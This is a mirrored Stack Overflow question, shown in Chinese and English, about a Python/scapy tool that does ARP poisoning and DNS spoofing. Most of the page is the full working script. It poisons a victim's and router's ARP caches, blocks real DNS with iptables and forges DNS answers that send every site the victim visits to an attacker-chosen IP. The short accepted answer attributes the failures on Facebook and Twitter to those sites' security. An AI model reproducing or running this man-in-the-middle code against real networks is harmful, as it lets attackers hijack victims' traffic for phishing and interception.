堆栈内存溢出
  简体   繁体   English

我的DNS欺骗仅适用于某些网站?

[英]my dns spoofing only works with some sites?

 原文  2017-10-29 18:19:19       python/ security/ dns/ arp

问题描述

I created a DNF spoofer (with ARP poisoning) in python just for fun. 我在python中创建了DNF spoofer(带有ARP中毒),只是为了好玩。 My goal is just to redirect a victim's dns requests to my site. 我的目标只是将受害者的dns请求重定向到我的站点。 so whenever they go to any website, they go to my site instead. 因此,无论何时他们访问任何网站,他们都会访问我的网站。 However it only seems to work on some sites not all of them, doesn't seem to work when they go to sites like twitter or facebook, but when going to google or smaller sites they get redirected just fine? 但是,它似乎仅在某些网站上起作用,而不是在所有网站上都起作用,当它们访问诸如twitter或facebook之类的网站时似乎不起作用,但是当访问google或更小的网站时,它们被重定向就好了吗? I'm also using iptables rules in my code to block all dns from the router. 我还在代码中使用iptables规则来阻止来自路由器的所有DNS。

Anyone know why? 有人知道为什么吗?

code: 码: 

#command line arguments
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)

args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
localMAC = ""
victimMAC = ""
routerMAC = ""

#Setup function
def setup():
    #setup forwarding rules
    #disable forwarding of DNS requests to router
    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
    #iptables rule
    Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)

#Flush iptables on exit
def reset():
    Popen(["iptables -F"], shell=True, stdout=PIPE)

#get MACaddress of local machine
def getOurMAC(interface):
    try:
        mac = open('/sys/class/net/'+interface+'/address').readline()
    except:
        mac = "00:00:00:00:00:00"
    return mac[0:17]


#returns MAC address of victim IP
def getTargetMAC(IP):
    #add the target to our system's ARP cache
    pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
    pid = Popen(["arp", "-n", IP], stdout=PIPE)
    s = pid.communicate()[0]
    MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]

    return MAC


#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
    arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
    arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
    print str(vIP) + " has been poisoned."
    while True:
        try:
            sendp(arpPacketVictim, verbose=0)
            sendp(arpPacketRouter, verbose=0)
            #pause between each send
            time.sleep(3)
        except KeyboardInterrupt:
            sys.exit(0)

#construct and send a spoofed DNS response packet to the victim
def reply(packet):
    global targetIP
    responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
                    DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
    send(responsePacket, verbose=0)
    print "Sent spoofed DNS Packet"
    return

#this parse creates a thread
def parse(packet):
    if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
        replyThread = threading.Thread(target=reply, args=packet)
        replyThread.start()

#initiate sniff filter for DNS requests
def DNSsniffer():
    global vIP
    print "Sniffing DNS"
    sniffFilter = "udp and port 53 and src " +str(vIP)
    sniff(filter=sniffFilter, prn=parse)

# main function
def main():
    victimMAC = getTargetMAC(vIP)
    localMAC = getOurMAC("eno1")#Datacomm card
    routerMAC = getTargetMAC(routerIP)

    #threads creation
    ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
    sniffThread = threading.Thread(target=DNSsniffer)
    #
    ARPThread.daemon = True
    sniffThread.daemon = True
    #
    ARPThread.start()
    sniffThread.start()

    #Keyboard Interrupt
    while True:
        try:
            time.sleep(5)
        except KeyboardInterrupt:
            reset()
            print "Exiting"
            sys.exit(0)

#--------------------------------------------------
setup()
main()

UPDATE: I have done some further testing, it seems to redirect just fine when the victim is going to sites like google. 更新:我已经做了一些进一步的测试,当受害者转到google之类的网站时,重定向似乎很好。 Fast loading sites, but for bigger sites, like facebook or twitter, it just seems to load forever. 网站加载速度很快,但是对于较大的网站,例如facebook或twitter,它似乎永远都可以加载。

instead of spawning threads, could I spawn processes instead? 我可以生成进程,而不是生成线程吗?

1 个解决方案

解决方案1
 0 已采纳  2017-11-24 04:09:45

事实证明,这只是Facebook和Twitter上的安全性,可共同阻止欺骗,我的代码没有错。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 使用 Python 和 NetFilterQueue 进行 DNS 欺骗 - DNS Spoofing with Python and NetFilterQueue DNS欺骗与Scapy客户端超时 - dns spoofing with scapy client timingout Python DNS欺骗无法正常工作无法解决 - Python dns spoofing dont work nome not resolved 为什么我的SQLAlchemy query.flter仅适用于某些属性? - Why my SQLAlchemy query.flter works only on some attribute? Badlinestatus: <html> | 带有http.client的Python-适用于某些网站,但不适用于其他网站 - Badlinestatus: <html> | Python with http.client - Works for some sites but not others 仅使用Python欺骗MAC? - Spoofing MAC using Python only? 仅在我两个相同的网站之一上出现ImportError - ImportError on only one of my two identical sites 我的蜘蛛只是选择了一些网站并给出了错误 - my spider just picks up some sites and gives an error wget.download() 仅适用于某些链接 - wget.download() only works for some links heroku 上的机器人 - 由于验证码无法废弃网站,即使我的电脑上一切正常 - Bot on heroku - unable to scrap sites because of captcha even though everything works on my pc
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM